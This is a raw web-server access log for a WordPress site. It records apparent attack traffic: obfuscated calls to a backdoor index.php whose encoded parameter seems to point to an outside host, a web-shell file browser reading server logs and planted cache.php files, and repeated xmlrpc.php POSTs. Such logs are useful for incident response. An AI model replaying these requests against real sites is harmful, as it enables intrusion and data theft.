142.4.205.1 - - [16/Oct/2025:11:43:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633323938392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393338392q3734323436343935663866343135643430393561613864653034383633616361222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
65.108.2.171 - - [16/Oct/2025:11:44:23 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_log.processed&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6682 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:25 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_log.processed.1.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6686 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:27 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_log.processed.2.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6686 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:11:43:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333030392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393430392q6333396632333336336462353064386261623438633563353966636466363037222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
65.108.2.171 - - [16/Oct/2025:11:44:29 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_log.processed.3.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6686 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:38 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_log.processed.4.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6686 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:40 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_log.processed.5.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6686 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:42 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_log.processed.6.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6686 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:45 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_log.processed.7.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6687 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:47 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_log.webstat&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 9901 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:11:43:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333032392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393432392q6434386362653337656262356639663936613532656165646334343261636139222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
65.108.2.171 - - [16/Oct/2025:11:44:49 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_ssl_log&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 45461 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:52 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_ssl_log.processed&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6685 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:54 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_ssl_log.processed.1.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6689 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:44:58 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_ssl_log.processed.2.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6689 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:00 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_ssl_log.processed.3.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6689 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:02 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_ssl_log.processed.4.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6689 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:04 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_ssl_log.processed.5.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6689 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:07 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_ssl_log.processed.6.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6689 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:11:44:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333034392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393434392q3837666466616563613462613634623631303162633139333639366437623832222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
65.108.2.171 - - [16/Oct/2025:11:45:09 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_ssl_log.processed.7.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6690 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:11 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/access_ssl_log.webstat&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 280929 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:14 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/error_log&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 133117 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:17 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/error_log.1.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6680 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:19 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/error_log.2.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6680 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:21 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/error_log.3.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6680 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:23 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/error_log.4.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6679 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:26 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/error_log.5.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6680 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:28 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/error_log.6.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6680 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:11:44:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333036392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393436392q6563386333633039633832666465326338666238336237643362666532303336222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
65.108.2.171 - - [16/Oct/2025:11:45:30 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/proxy_access_log&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 7083 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:33 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/proxy_error_log.1.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6685 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:35 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/proxy_error_log.2.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6685 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:37 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/proxy_error_log.3.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6685 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:39 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/proxy_error_log.4.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6684 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:41 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/proxy_error_log.6.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6685 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:43 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/logs/proxy_error_log.7.gz&path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 6685 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:46 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/php/.lock&path=/var/www/vhosts/academiedumarketing.com/php HTTP/1.0" 200 6674 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:48 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/AvEhfIyetYTWjiR/bmp_68e4b8cadfd8f.zip&path=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/AvEhfIyetYTWjiR HTTP/1.0" 200 6727 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:11:44:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333038392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393438392q3836316165636331326166363364356261393061633663356532333334646434222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
65.108.2.171 - - [16/Oct/2025:11:45:50 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/AvEhfIyetYTWjiR/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/AvEhfIyetYTWjiR HTTP/1.0" 200 6944 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:52 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/AvEhfIyetYTWjiR/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/AvEhfIyetYTWjiR HTTP/1.0" 200 6943 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:54 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk/RYHFajgJGk/3gp_68e4b8db63c0f.zip&path=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk/RYHFajgJGk HTTP/1.0" 200 6722 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:57 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk/RYHFajgJGk/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk/RYHFajgJGk HTTP/1.0" 200 6945 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:45:59 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs/aAqlKLnxmZitXs/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs/aAqlKLnxmZitXs HTTP/1.0" 200 6955 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:46:01 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH/brYIQEH/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH/brYIQEH HTTP/1.0" 200 11309 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:46:03 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/images/images/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/images/images HTTP/1.0" 200 11318 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:46:05 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/images/images/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/images/images HTTP/1.0" 200 9024 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:46:07 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/AvEhfIyetYTWjiR/AvEhfIyetYTWjiR HTTP/1.0" 200 7271 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
5.189.139.221 - - [16/Oct/2025:11:46:08 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
142.4.205.1 - - [16/Oct/2025:11:45:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333130392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393530392q6264663033313331383962393339333266323836346535656533643066386531222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:11:46:09 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4154 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
65.108.2.171 - - [16/Oct/2025:11:46:10 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk/RYHFajgJGk/RYHFajgJGk HTTP/1.0" 200 7272 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:46:12 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs/aAqlKLnxmZitXs/aAqlKLnxmZitXs HTTP/1.0" 200 7202 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:46:14 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH/brYIQEH/brYIQEH HTTP/1.0" 200 7303 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.2.171 - - [16/Oct/2025:11:46:17 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/jGVNHJwRnIpsga/jGVNHJwRnIpsga/jGVNHJwRnIpsga HTTP/1.0" 200 7148 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
5.189.139.221 - - [16/Oct/2025:11:46:18 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
142.4.205.1 - - [16/Oct/2025:11:45:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333132392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393532392q3037616132653936323066386266376434366534633739343636356439313161222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
5.189.139.221 - - [16/Oct/2025:11:46:32 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
5.189.139.221 - - [16/Oct/2025:11:46:47 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
142.4.205.1 - - [16/Oct/2025:11:45:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333134392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393534392q6239333731643962363363323561376130363139313766373436646234663935222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:11:45:49 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; ja-jp) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12"
5.189.139.221 - - [16/Oct/2025:11:47:01 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
142.4.205.1 - - [16/Oct/2025:11:46:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333136392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393536392q3439376164643539303135323761323730383732346166636636636165346461222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
5.189.139.221 - - [16/Oct/2025:11:47:20 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
142.4.205.1 - - [16/Oct/2025:11:46:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333138392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393538392q3038316631343237333662613663356137366163653137643639363138326161222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:46:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333230392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393630392q6535616232663436343933656137303030343763306266343237376665356439222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
